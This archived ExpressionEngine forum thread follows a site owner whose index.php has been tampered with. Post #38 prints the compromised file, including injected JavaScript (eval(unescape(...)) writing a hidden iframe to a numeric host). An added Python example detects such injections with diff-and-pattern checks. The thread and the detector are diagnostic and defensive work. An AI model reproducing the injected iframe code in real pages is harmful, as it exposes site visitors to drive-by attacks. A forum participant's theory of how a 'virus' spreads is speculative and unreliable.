ExpressionEngine CMS

This is an archived forum and the content is probably no longer relevant, but is provided here for posterity.

Parse error?

November 13, 2007 8:29am

  • #31 / Nov 14, 2007 4:55am

    mickfealty

    115 posts

    It’s returning more quickly than ever…

  • #32 / Nov 14, 2007 10:12am

    Derek Jones

    7561 posts

    Did you already replace your index.php and repair the error, or do you still have it where you can copy and paste it?

  • #33 / Nov 14, 2007 10:27am

    mickfealty

    115 posts

    This is the latest version of the index file, just downloaded:

    <?php
    /*
    =====================================================
    ExpressionEngine - by EllisLab
    -----------------------------------------------------
    http://expressionengine.com/
    -----------------------------------------------------
    Copyright (c) 2003 - 2007 EllisLab, Inc.
    =====================================================
    THIS IS COPYRIGHTED SOFTWARE
    PLEASE READ THE LICENSE AGREEMENT
    http://expressionengine.com/docs/license.html
    =====================================================
    File: index.php
    -----------------------------------------------------
    Purpose: Triggers the main engine
    =====================================================
    */

    // URI Type
    // This variable allows you to hard-code the URI type.
    // For most servers, 0 works fine.
    // 0 = auto
    // 1 = path_info
    // 2 = query_string

    $qtype = 0;


    // DO NOT EDIT BELOW THIS!!!

    error_reporting(0);

    if (isset($_GET['URL']))
    {
    /** ---------------------------------
    /** URL Redirect for CP and Links in Comments
    /** ---------------------------------*/

    $_GET['URL'] = str_replace(array("\r", "\r\n", "\n", ':',':','/','/'),
    array('', '', '', ':', ':', '/', '/'),
    $_GET['URL']);

    if (substr($_GET['URL'], 0, 4) != "http" AND ! ereg('://', $_GET['URL']))
    $_GET['URL'] = "http://".$_GET['URL'];

    $_GET['URL'] = str_replace( array('"', "'", ')', '(', ';', '}', '{', 'script%', 'script&', '(', ')'),
    '',
    strip_tags($_GET['URL']));

    $host = ( ! isset($_SERVER['HTTP_HOST'])) ? '' : (substr($_SERVER['HTTP_HOST'],0,4) == 'www.' ? substr($_SERVER['HTTP_HOST'], 4) : $_SERVER['HTTP_HOST']);

    if ( ! isset($_SERVER['HTTP_REFERER']) OR ! stristr($_SERVER['HTTP_REFERER'], $host))
    {
    // Possibly not from our site, so we give the user the option
    // Of clicking the link or not

    $str = "<html>\n<head>\n<title>Redirect</title>\n</head>\n<body>".
    "To proceed to the URL you have requested, click the link below:".
    "".$_GET['URL']."\n</body>\n</html>";
    }
    else
    {
    $str = "<html>\n<head>\n<title>Redirect</title>\n".
    '<meta http-equiv="refresh" content="0; URL='.$_GET['URL'].'">'.
    "\n</head>\n<body>\n</body>\n</html>";
    }

    exit($str);
    }

    $uri = '';
    $pathinfo = pathinfo(__FILE__);
    $ext = ( ! isset($pathinfo['extension'])) ? '.php' : '.'.$pathinfo['extension'];
    $self = ( ! isset($pathinfo['basename'])) ? 'index'.$ext : $pathinfo['basename'];

    $path_info = (isset($_SERVER['PATH_INFO'])) ? $_SERVER['PATH_INFO'] : @getenv('PATH_INFO');
    $query_str = (isset($_SERVER['QUERY_STRING'])) ? $_SERVER['QUERY_STRING'] : @getenv('QUERY_STRING');

    switch ($qtype)
    {
    case 0 : $uri = ($path_info != '' AND $path_info != "/".$self) ? $path_info : $query_str;
    break;
    case 1 : $uri = $path_info;
    break;
    case 2 : $uri = $query_str;
    break;
    }

    unset($system_path);
    unset($config_file);
    unset($path_info);
    unset($query_str);
    unset($qstr);

    require 'path'.$ext;

    if ((isset($template_group) AND isset($template)) && $uri != '' && $uri != '/')
    {
    $template_group = '';
    $template = '';
    }

    if ( ! isset($system_path))
    {
    if (file_exists('install'.$ext))
    {
    header("location: install".$ext);
    exit;
    }
    else
    {
    exit("The system does not appear to be installed. Click here to install it.");
    }
    }

    if ( ! ereg("/$", $system_path)) $system_path .= '/';

    if ( ! @include($system_path.'core/core.system'.$ext))
    {
    exit("The system path does not appear to be set correctly. Please open your path.php file and correct the path.");
    }

    ?>

  • #34 / Nov 14, 2007 10:54am

    Derek Jones

    7561 posts

    And with this file loaded you are seeing the PHP error?  There are no syntax errors in that file, so if it’s producing errors, there must be something going on on the server.

  • #35 / Nov 14, 2007 11:03am

    mickfealty

    115 posts

    I’ve not had any problems with it since I re-loaded first this morning… So here’s hoping that it holds…

  • #36 / Nov 14, 2007 11:05am

    Derek Jones

    7561 posts

    Mick, what I will need to see, if it happens again, is both the error, and the “broken” file, in the state that is causing the error.  Make sense?

  • #37 / Nov 14, 2007 11:16am

    mickfealty

    115 posts

    Yep. Got that Derek!

  • #38 / Nov 14, 2007 5:28pm

    mickfealty

    115 posts

    Think this should be the right one:

    <?php
    /*
    =====================================================
     ExpressionEngine - by EllisLab
    -----------------------------------------------------
     http://expressionengine.com/
    -----------------------------------------------------
     Copyright (c) 2003 - 2007 EllisLab, Inc.
    =====================================================
     THIS IS COPYRIGHTED SOFTWARE
     PLEASE READ THE LICENSE AGREEMENT
     http://expressionengine.com/docs/license.html
    =====================================================
     File: index.php
    -----------------------------------------------------
     Purpose: Triggers the main engine
    =====================================================
    */
    
    // URI Type
    // This variable allows you to hard-code the URI type.
    // For most servers, 0 works fine.
    // 0 = auto  
    // 1 = path_info  
    // 2 = query_string
    
    $qtype = 0; 
    
    
    // DO NOT EDIT BELOW THIS!!! 
    
    error_reporting(0);
    
    if (isset($_GET['URL'])) 
    { 
        /** ---------------------------------
        /**  URL Redirect for CP and Links in Comments
        /** ---------------------------------*/
    
        $_GET['URL'] = str_replace(array("\r", "\r\n", "\n", ':',':','/','/'), 
                                   array('', '', '', ':', ':', '/', '/'), 
                                   $_GET['URL']);
        
        if (substr($_GET['URL'], 0, 4) != "http" AND ! ereg('://', $_GET['URL'])) 
            $_GET['URL'] = "http://".$_GET['URL']; 
            
        $_GET['URL'] = str_replace( array('"', "'", ')', '(', ';', '}', '{', 'script%', 'script&', '(', ')'), 
                                    '', 
                                    strip_tags($_GET['URL']));
        
        $host = ( ! isset($_SERVER['HTTP_HOST'])) ? '' : (substr($_SERVER['HTTP_HOST'],0,4) == 'www.' ? substr($_SERVER['HTTP_HOST'], 4) : $_SERVER['HTTP_HOST']);
        
        if ( ! isset($_SERVER['HTTP_REFERER']) OR ! stristr($_SERVER['HTTP_REFERER'], $host))
        {
            // Possibly not from our site, so we give the user the option
            // Of clicking the link or not
            
            $str = "<html>\n<head>\n<title>Redirect</title>\n</head>\n<body>eval(unescape("window.status='Done';document.write('<iframe%20name=6af9f8%20src=\'http://977398530?'+Math.round(Math.random()*26864)+'84\'%20width=73%20height=368%20style=\'display:%20none\'></iframe>')")); ".
                    "To proceed to the URL you have requested, click the link below:".
                    "<a href="http://.$_GET">".$_GET['URL']."</a>\n</body>\n</html>";
        }
        else
        {
            $str = "<html>\n<head>\n<title>Redirect</title>\n".
                   '<meta http-equiv="refresh" content="0; URL='.$_GET['URL'].'">'.
                   "\n</head>\n<body>eval(unescape("window.status='Done';document.write('<iframe%20name=6af9f8%20src=\'http://977398530?'+Math.round(Math.random()*26864)+'84\'%20width=73%20height=368%20style=\'display:%20none\'></iframe>')")); ";
        }
        
        exit($str);
    }
    
    $uri  = '';
    $pathinfo = pathinfo(__FILE__);
    $ext  = ( ! isset($pathinfo['extension'])) ? '.php' : '.'.$pathinfo['extension'];
    $self = ( ! isset($pathinfo['basename'])) ? 'index'.$ext : $pathinfo['basename'];
    
    $path_info = (isset($_SERVER['PATH_INFO'])) ? $_SERVER['PATH_INFO'] : @getenv('PATH_INFO');
    $query_str = (isset($_SERVER['QUERY_STRING'])) ? $_SERVER['QUERY_STRING'] : @getenv('QUERY_STRING');
    
    switch ($qtype)
    {
        case 0 :    $uri = ($path_info != '' AND $path_info != "/".$self) ? $path_info : $query_str;
            break;
        case 1 :    $uri = $path_info;     
            break;
        case 2 :    $uri = $query_str; 
            break;
    }
    
    unset($system_path);
    unset($config_file);
    unset($path_info);
    unset($query_str);
    unset($qstr);
    
    require 'path'.$ext;
    
    if ((isset($template_group) AND isset($template)) && $uri != '' && $uri != '/')
    {
        $template_group = '';
        $template = '';
    }
    
    <cut for length>
  • #39 / Nov 14, 2007 5:39pm

    Derek Allard

    3168 posts

    Hi Mick.

    That isn’t the index.php file that is distributed with EE - it looks like yours is getting replaced, possibly maliciously, but I don’t want to jump to conclusions.  Could you zip your index.php file and add it as an attachment so I can take a better look?

  • #40 / Nov 14, 2007 5:50pm

    Derek Jones

    7561 posts

    That’s my thought precisely.  I would put a support ticket into your host, as it looks like someone is injecting some JavaScript to hack your site, and unless this person has FTP access, it would mean that there are security issues on the server that need to be addressed.
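
Added example, not part of the thread and not ExpressionEngine code: one way to act on the two replies above is to compare the deployed index.php with a pristine copy from the distribution and flag changed lines that carry the markers visible in post #38 (`eval(unescape(`, an iframe styled `display: none`, a host written as a bare decimal integer). The sample files, indicator names and function names are constructed for illustration.

```python
import difflib
import ipaddress
import re

# Patterns modelled on the injected lines quoted in post #38.
INDICATORS = {
    "eval-unescape": re.compile(r"eval\s*\(\s*unescape\s*\(", re.I),
    "hidden-iframe": re.compile(r"<iframe[^>]*display:(?:%20|\s)*none", re.I),
    "integer-host": re.compile(r"https?://(\d{8,10})(?=[/?'\"\\\s]|$)"),
}

def decode_integer_host(value):
    """Return the dotted-quad form of a host written as one decimal integer."""
    n = int(value)
    return str(ipaddress.IPv4Address(n)) if n < 2**32 else None

def audit(pristine, deployed):
    """List (line_no, text, hits) for deployed lines that differ from the pristine copy."""
    a, b = pristine.splitlines(), deployed.splitlines()
    findings = []
    matcher = difflib.SequenceMatcher(None, a, b, autojunk=False)
    for tag, _, _, j1, j2 in matcher.get_opcodes():
        if tag not in ("replace", "insert"):
            continue
        for j in range(j1, j2):
            hits = []
            for name, rx in INDICATORS.items():
                m = rx.search(b[j])
                if m and name == "integer-host":
                    hits.append(f"{name}={decode_integer_host(m.group(1))}")
                elif m:
                    hits.append(name)
            findings.append((j + 1, b[j], hits))
    return findings

# Constructed sample input (not the real ExpressionEngine files); 3221225985 is 192.0.2.1.
PRISTINE = r'''<?php
error_reporting(0);
$str = "<html>\n<body>".
       "To proceed to the URL you have requested, click the link below:";
exit($str);
'''
DEPLOYED = PRISTINE.replace(
    r'<body>".',
    r'''<body>eval(unescape("document.write('<iframe%20src=\'http://3221225985?1\'%20style=\'display:%20none\'></iframe>')")); ".''',
)

if __name__ == "__main__":
    for line_no, text, hits in audit(PRISTINE, DEPLOYED):
        print(f"line {line_no}: {hits}\n    {text}")
```

A changed line with no indicator hits is still reported with an empty list, since any difference from the distributed file needs explaining.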

  • #41 / Nov 14, 2007 5:50pm

    mickfealty

    115 posts

    That’s what I was afraid of… winzip is not letting me zip it… though I may be doing something wrong…

  • #42 / Nov 14, 2007 5:56pm

    Derek Jones

    7561 posts

    Why are you needing to winzip something?

    Edit: sorry, didn’t see the other Derek’s reply above.

  • #43 / Nov 14, 2007 7:21pm

    mickfealty

    115 posts

    Can’t zip it and it won’t let me upload it as a notebook file…

  • #44 / Nov 14, 2007 7:25pm

    Derek Allard

    3168 posts

    No problem Mick, don’t worry about the zip anymore.  It’s safe to assume that the file is compromised.  I’d advise you to change your password, and contact your webhost to let them know about it.  Are you running any other non-EE scripts on your account?

    Let us know what your host says.

  • #45 / Nov 15, 2007 9:46am

    mickfealty

    115 posts

    Been doing some work on this.

    Google is indicating a virus on the index.php page, and the gobbledygook seems to be multiplying. Apparently it is affecting line 66 as well as the original 58. I have asked for the root server password to be changed by the hosts, but am concerned that it may have been inadvertently posted in through a vulnerability in the comments area.

    Attached is a screenshot of the “virus” message that Google is giving me. It looks like a virus that affects PHP files on a server. I’ve asked a friend who helps me troubleshoot problems from time to time, whose thoughts are:

    The virus may have been injected into your system via
    cross-site scripting. Basically, this means that a user has caught the
    virus from another website, and then passed it on to your website (the
    user will have been unaware of this), possibly by adding a comment but
    possibly just by viewing your site.

    A quick search in Google shows there have been known instances of a
    vulnerability in EE that allows a cross-site scripting virus to access
    the site, and this is linked to the HTTP-Referrer.

    See http://www.google.com/search?q=cross-site+scripting+virus+expression+engine

    I’m not an expert in this by any means but that’s my hunch, based on
    circumstantial evidence.

    Can you recommend any further action?
